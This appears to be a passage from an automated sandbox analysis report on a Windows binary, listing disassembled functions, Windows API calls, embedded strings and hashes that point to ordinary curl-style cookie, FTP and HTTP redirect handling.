Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: socket$CriticalInitializeSectionbindconnectgetsocknamehtonlioctlsocketlistenmallocsetsockopt
String ID:
API String ID: 1746218282-0
Opcode ID: 0526e79d2450cd35fc52da0dce91c69f6bdb2740254bf15bda6842c73fc659b7
Instruction ID: 81314da52cacb9229991f82017acbbccc8857f751a3a13fecd50fca6225b163d
Opcode Fuzzy Hash: 0526e79d2450cd35fc52da0dce91c69f6bdb2740254bf15bda6842c73fc659b7
Instruction Fuzzy Hash: 9111E431610306AFDB149F25DC4579A3BE9EF00360F14856AF805EB1D2DBB0E9448BA0

Function 000CE08F Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00001000,?,00000000,00000000,00000000,?,000CDD03,?), ref: 000CE0C0
___from_strstr_to_strchr.LIBCMT ref: 000CE0FB

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ___from_strstr_to_strchrfgets
String ID:
API String ID: 4248516992-0
Opcode ID: c7db5857224c01f43b5def31efd87076a8d91383b680c63ceca060665c509dce
Instruction ID: d0100ee7832ec89f7f6c7e622f7d57e8be3662aa7a3e2fbc5065ce8afe56bbdc
Opcode Fuzzy Hash: c7db5857224c01f43b5def31efd87076a8d91383b680c63ceca060665c509dce
Instruction Fuzzy Hash: 40114C356003869ADB158F28DC01FEDB3E89F49350F1440ADE645D3141EBF49AC587A4

Function 000D21C0 Relevance: 3.0, APIs: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,000C8EF6), ref: 000D2208
WSACleanup.WS2_32 ref: 000D2227

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: CleanupFreeLibrary
String ID:
API String ID: 470324515-0
Opcode ID: aaa76cf02275ce7394f81667f6776554e5cc0989e98532488b3109ff86742c73
Instruction ID: 2a30072209826e177e9f332de340dc0586c4c2af020008fa397ac668a9f2ef9a
Opcode Fuzzy Hash: aaa76cf02275ce7394f81667f6776554e5cc0989e98532488b3109ff86742c73
Instruction Fuzzy Hash: 6EF04972611340ABD7799F28FE48B653BF4FB18306F18407EE540C6AA2C76488A3CB21

Function 0011131D Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 0011167B: GetModuleHandleW.KERNEL32(00000000,001112E6), ref: 0011167D

_c_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0011132F
_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000007,0012D000,00000014), ref: 0011135E

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: HandleModule_c_exit_exit
String ID:
API String ID: 750871209-0
Opcode ID: 3c1777749d1cee31703bb350baeb5762b3e2989e4a6dd223fce7200e68ead2c0
Instruction ID: d74927d106f1170e859d26778ef57f3a5a99cdc5316d2c0faa6bd9341e14be5d
Opcode Fuzzy Hash: 3c1777749d1cee31703bb350baeb5762b3e2989e4a6dd223fce7200e68ead2c0
Instruction Fuzzy Hash: 51E08C32A08249AFCF28ABD8E9023DCF772FB40324F100176DA21376A1D73618908A90

Function 000EE990 Relevance: 3.0, APIs: 2, Instructions: 19networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000017,00000002,00000000), ref: 000EE9A6
closesocket.WS2_32(00000000), ref: 000EE9B2

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: closesocketsocket
String ID:
API String ID: 2760038618-0
Opcode ID: 450cc3a95e74e284a193d48732d39d9c6d50c2b9d19e3bfc58ae81eb3efe3352
Instruction ID: 263f099918e6e83fb5acb154c8548c5143835165e500e6f18cca54f6af83d9a4
Opcode Fuzzy Hash: 450cc3a95e74e284a193d48732d39d9c6d50c2b9d19e3bfc58ae81eb3efe3352
Instruction Fuzzy Hash: B0D02B741451849FDE144BB08C9DBE537956741315F049264F4219B6D2C2114C029620

Function 000DF3FC Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

closesocket.WS2_32(000E1EF4), ref: 000DF433

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 784815eaa1d64e8df91c548b5c2993dd2865648caa67ac3fd69f99f9ca260154
Instruction ID: 46d08b14b85b09a141b268ccc0e6eadcca4bffdf2cd84aa559e3811b28a202c4
Opcode Fuzzy Hash: 784815eaa1d64e8df91c548b5c2993dd2865648caa67ac3fd69f99f9ca260154
Instruction Fuzzy Hash: 1901A2316047108BC7256B3498897BFB7D6ABC4314F48803FE44A93751CA74AC4583A5

Function 000D0B16 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

_open.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000100,00000180,?,000C2077,?,00008501,00000180), ref: 000D0B2D

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: _open
String ID:
API String ID: 4183159743-0
Opcode ID: 6dad21515287f7bdad97a633a4a333314bb2ad3e02e8f6ee262b331671ba354f
Instruction ID: 376ed5815f7fa6bf8cf60a3255eddf6573230311cf375ac929952c69e13a3eb3
Opcode Fuzzy Hash: 6dad21515287f7bdad97a633a4a333314bb2ad3e02e8f6ee262b331671ba354f
Instruction Fuzzy Hash: 7BD0123100060DEBCF014F64EC0599A37E9BF44354F00C014FD2C85020D771D974AF40

Function 000C31C0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

SetConsoleMode.KERNELBASE(000C31F4), ref: 000C31D9

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: c494d07ee6f17f342ab672c0cda0cda49de21b8e6f6a5f7b016109add09e8d77
Instruction ID: 0c4d7ff1929682be6f1b75f9ed87c0eccb8fe26e9e328c01e01660d5f61dd564
Opcode Fuzzy Hash: c494d07ee6f17f342ab672c0cda0cda49de21b8e6f6a5f7b016109add09e8d77
Instruction Fuzzy Hash: ECC04C30211611BFCF57CF78FE14A5436B2AB45345714407C9615D5974DB21C9A3DF50

Function 000F4ED8 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(00000000,000D2221,?,000C8EF6), ref: 000F4EE2

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 1c0cdeffae751483300e1464e0eaf48367d23815eb41c08706ae1241a67569de
Instruction ID: a6801bbd81d8231cc6f4b2742b58df04c45cd37ae0fe1c0ff7e45e98cde7135d
Opcode Fuzzy Hash: 1c0cdeffae751483300e1464e0eaf48367d23815eb41c08706ae1241a67569de
Instruction Fuzzy Hash: 02C04C75510642EFD7618F28FD0C76733B8BB40B67F40443C9500D1C60E77884ABCA10

Function 000ED032 Relevance: 1.3, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000ED06B

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 3b5ae5b90c6742c1799113c1500857ab0f0a60e7598f9d5366ae782c70824cb2
Instruction ID: b95278374ce0afe009540d906b55b2c715d8444eb08cd4b3b531f651391056e1
Opcode Fuzzy Hash: 3b5ae5b90c6742c1799113c1500857ab0f0a60e7598f9d5366ae782c70824cb2
Instruction Fuzzy Hash: 21F08232700612DFD7649F29E884795F3B5FF44361F29412BE82093641CB79BD92CAE5

Function 000D7B5D Relevance: 1.3, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D7B80

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 8e364d6724b511ca94452b8bcb1811e920fa6ded252d82880ebb1074a2229640
Instruction ID: 6fd0b6164c510a7d99dfd38da8ab703feaa45086388d1c06b4f12ec61adb54ef
Opcode Fuzzy Hash: 8e364d6724b511ca94452b8bcb1811e920fa6ded252d82880ebb1074a2229640
Instruction Fuzzy Hash: 9AE0867271D6159EF7588A28FC00B99B3DAFB84720F00013BE218C3144EBB068824A94

Non-executed Functions

Function 000DFAEC Relevance: 102.7, APIs: 34, Strings: 24, Instructions: 1200stringCOMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,00000000,00000000,?,000E09DF,?,00000001,0000000C,00000000,00000000,00000001), ref: 000DFB30
calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DFB5E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DFBA1
___from_strstr_to_strchr.LIBCMT ref: 000DFBAC
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(__Secure-,0000005F,00000009), ref: 000DFD02
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(__Host-,?,00000007), ref: 000DFD23
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DFE2F
___from_strstr_to_strchr.LIBCMT ref: 000DFE73
___from_strstr_to_strchr.LIBCMT ref: 000DFFC8
___from_strstr_to_strchr.LIBCMT ref: 000DFFE5
___from_strstr_to_strchr.LIBCMT ref: 000E012C
_strrchr.LIBCMT ref: 000E013A
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E016E
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,#HttpOnly_,0000000A), ref: 000E01D0
___from_strstr_to_strchr.LIBCMT ref: 000E01F0
___from_strstr_to_strchr.LIBCMT ref: 000E0201
___from_strstr_to_strchr.LIBCMT ref: 000E0610
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E06CC
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E06E0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E06F4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E0708
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E071C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E0730
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E0744
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E0758
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E0778

Part of subcall function 000DF9D3: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DF9EA

calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E086B
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000E08DD
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00001000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000E093F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E096E
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000E0992
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00001000,?,?,?,?,?,?,?,?,?,?,00000000,?,?,000E126F), ref: 000E0A02
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000E0A14

Strings

__Secure-, xrefs: 000DFCFD, 000E02E1
expires, xrefs: 000DFF80
#HttpOnly_, xrefs: 000E01CA
%s cookie %s="%s" for domain %s, path %s, expire %I64d, xrefs: 000E07C6
version, xrefs: 000DFF38
FALSE, xrefs: 000E034F
domain, xrefs: 000DFE48
=, xrefs: 000DFDE9
httponly, xrefs: 000DFDD0
__Host-, xrefs: 000DFD1E, 000E02FF
skipped cookie with bad tailmatch domain: %s, xrefs: 000DFF16
Added, xrefs: 000E07A9
_, xrefs: 000DFCEB
secure, xrefs: 000DFD98
TRUE, xrefs: 000E0235, 000E0299, 000E0309, 000E03B5, 000E046F
path, xrefs: 000DFDFC
localhost, xrefs: 000DFE60
oversized cookie dropped, name/val %zu + %zu bytes, xrefs: 000E0057
WARNING: failed to open cookie file "%s", xrefs: 000E0906
Replaced, xrefs: 000E07B1, 000E07C5
_, xrefs: 000DFCE2
none, xrefs: 000E0880, 000E0892
%4095[^;=] =%4095[^;], xrefs: 000DFBE8
max-age, xrefs: 000DFF5C

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$___from_strstr_to_strchr$strncmp$callocfclosemalloc$__acrt_iob_func_strrchr_time64
String ID: #HttpOnly_$%4095[^;=] =%4095[^;]$%s cookie %s="%s" for domain %s, path %s, expire %I64d$=$Added$FALSE$Replaced$TRUE$WARNING: failed to open cookie file "%s"$_$_$__Host-$__Secure-$domain$expires$httponly$localhost$max-age$none$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
API String ID: 2930520296-3004133991
Opcode ID: dd91c41c989213d65755343c693b57ecc9feb225133b29ac8bedb06494b983fb
Instruction ID: efea8e1d0d4d67a833fb36245baebc47c3e2adc95523ef3b6f49fe49515d4744
Opcode Fuzzy Hash: dd91c41c989213d65755343c693b57ecc9feb225133b29ac8bedb06494b983fb
Instruction Fuzzy Hash: D1924930A043969FDB258F25D8443B97BE1BF45310F1480BBD88AA7683DBB09DD1CBA1

Function 000FA8D8 Relevance: 67.1, APIs: 24, Strings: 14, Instructions: 608networkstringCOMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FA997
___from_strstr_to_strchr.LIBCMT ref: 000FA9B5
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 000FAA1F
___from_strstr_to_strchr.LIBCMT ref: 000FAA33
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,00000000,0000000A), ref: 000FAA4B
___from_strstr_to_strchr.LIBCMT ref: 000FAA5A
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,00000000,0000000A), ref: 000FAA6B
getsockname.WS2_32(?,?,?), ref: 000FAB16
WSAGetLastError.WS2_32 ref: 000FAB21
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FABEA
WSAGetLastError.WS2_32 ref: 000FAC18
htons.WS2_32(?), ref: 000FAC95
bind.WS2_32(000000FF,?,00000080), ref: 000FACB3
WSAGetLastError.WS2_32 ref: 000FACC1
getsockname.WS2_32(?,?,00000080), ref: 000FAD1D
WSAGetLastError.WS2_32 ref: 000FAD53

Part of subcall function 000DA0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000DA0C3
Part of subcall function 000DA0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA0CB
Part of subcall function 000DA0B8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA0DD
Part of subcall function 000DA0B8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000FF), ref: 000DA0EC
Part of subcall function 000DA0B8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 000DA0F6
Part of subcall function 000DA0B8: _strrchr.LIBCMT ref: 000DA142
Part of subcall function 000DA0B8: _strrchr.LIBCMT ref: 000DA15C
Part of subcall function 000DA0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA173
Part of subcall function 000DA0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA180
Part of subcall function 000DA0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000DA188
Part of subcall function 000DA0B8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 000DA193

Part of subcall function 000DF3FC: closesocket.WS2_32(000E1EF4), ref: 000DF433

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FB090

Strings

Failure sending PORT command: %s, xrefs: 000FAF8A
%s %s, xrefs: 000FAF5F
failed to resolve the address provided to PORT: %s, xrefs: 000FB073
socket failure: %s, xrefs: 000FAC3B, 000FAE3F
,, xrefs: 000FAF0D
,%d,%d, xrefs: 000FAF43
bind() failed, we ran out of ports, xrefs: 000FB04F
Failure sending EPRT command: %s, xrefs: 000FAFE9
PORT, xrefs: 000FAF5A
EPRT, xrefs: 000FAFBD
getsockname() failed: %s, xrefs: 000FAB36, 000FAD68, 000FAE06
bind(port=%hu) on non-local address failed: %s, xrefs: 000FACEB
bind(port=%hu) failed: %s, xrefs: 000FAD99
%s |%d|%s|%hu|, xrefs: 000FAFC2

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ErrorLast$___from_strstr_to_strchr_errno$_strrchrfreegetsocknamestrncpystrtoul$__sys_errlist__sys_nerrbindcallocclosesockethtons
String ID: %s %s$%s |%d|%s|%hu|$,$,%d,%d$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$PORT$bind() failed, we ran out of ports$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
API String ID: 2930231303-3103743990
Opcode ID: b48fe0ac9819612b721a6ecb74bfe290a4c3fbd5a309a241082055a428753e2d
Instruction ID: c2e0c39d2421a0659120527d1d4ef0e31693fb697fd314cbad520314da26decb
Opcode Fuzzy Hash: b48fe0ac9819612b721a6ecb74bfe290a4c3fbd5a309a241082055a428753e2d
Instruction Fuzzy Hash: 8322F8B0B0022D9FDB24DF24DC85BFE77B6AF85300F0440A9E94997682DB714E949F66

Function 000DDEDF Relevance: 35.3, APIs: 11, Strings: 9, Instructions: 278networkstringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(if!,?,00000003), ref: 000DDF9A
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(host!,?,00000005), ref: 000DDFC9
inet_pton.WS2_32(00000017,?,?), ref: 000DE0C2
inet_pton.WS2_32(00000002,?,?), ref: 000DE0EB
htons.WS2_32(?), ref: 000DE100
htons.WS2_32(?), ref: 000DE136
htons.WS2_32(?), ref: 000DE18A
bind.WS2_32(?,?,?), ref: 000DE1A5
getsockname.WS2_32(?,?,?), ref: 000DE1E0
WSAGetLastError.WS2_32 ref: 000DE1EA
WSAGetLastError.WS2_32 ref: 000DE21C

Strings

Couldn't bind to interface '%s', xrefs: 000DDFAB
Local port: %hu, xrefs: 000DE246
host!, xrefs: 000DDFC4
bind failed with errno %d: %s, xrefs: 000DE23B
if!, xrefs: 000DDF95
Name '%s' family %i resolved to '%s' family %i, xrefs: 000DE07D
Couldn't bind to '%s', xrefs: 000DE119
getsockname() failed with errno %d: %s, xrefs: 000DE209
Bind to local port %hu failed, trying next, xrefs: 000DE177

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: htons$ErrorLastinet_ptonstrncmp$bindgetsockname
String ID: Bind to local port %hu failed, trying next$Couldn't bind to '%s'$Couldn't bind to interface '%s'$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$getsockname() failed with errno %d: %s$host!$if!
API String ID: 2929934046-1901189404
Opcode ID: a31fc9f37a6a508334823468e8fcf1c79f77f168da2981b12b503fb697e550f6
Instruction ID: 4eb1c5eee8f4789cc9b48034e65216c85d9280f47a47f1a2906dc16a3509d09f
Opcode Fuzzy Hash: a31fc9f37a6a508334823468e8fcf1c79f77f168da2981b12b503fb697e550f6
Instruction Fuzzy Hash: ACA1C775A00368ABDB64AB24DC49FE977B8AF45700F1441A6F44DEB341EB709EC08BA1

Function 000EC1FD Relevance: 24.4, APIs: 8, Strings: 8, Instructions: 383COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000EC286
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000EC446
atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 000EC453
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000EC46D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000EC4EB
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000EC508
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000EC527
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000EC590

Strings

Maximum (%ld) redirects followed, xrefs: 000EC550
HEAD, xrefs: 000EC607, 000EC61B
Clear auth, redirects to port from %u to %u, xrefs: 000EC47C
Issue another request to this URL: '%s', xrefs: 000EC597
Switch to %s, xrefs: 000EC61C
GET, xrefs: 000EC602
Switch from POST to GET, xrefs: 000EC668
Clear auth, redirects scheme from %s to %s, xrefs: 000EC4C8

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$atoi
String ID: Clear auth, redirects scheme from %s to %s$Clear auth, redirects to port from %u to %u$GET$HEAD$Issue another request to this URL: '%s'$Maximum (%ld) redirects followed$Switch from POST to GET$Switch to %s
API String ID: 2493182076-1748258277
Opcode ID: a6d818fb4a2c307812207ee7f595a45ed0817d4fdf6314baf44f2e20bf34eca0
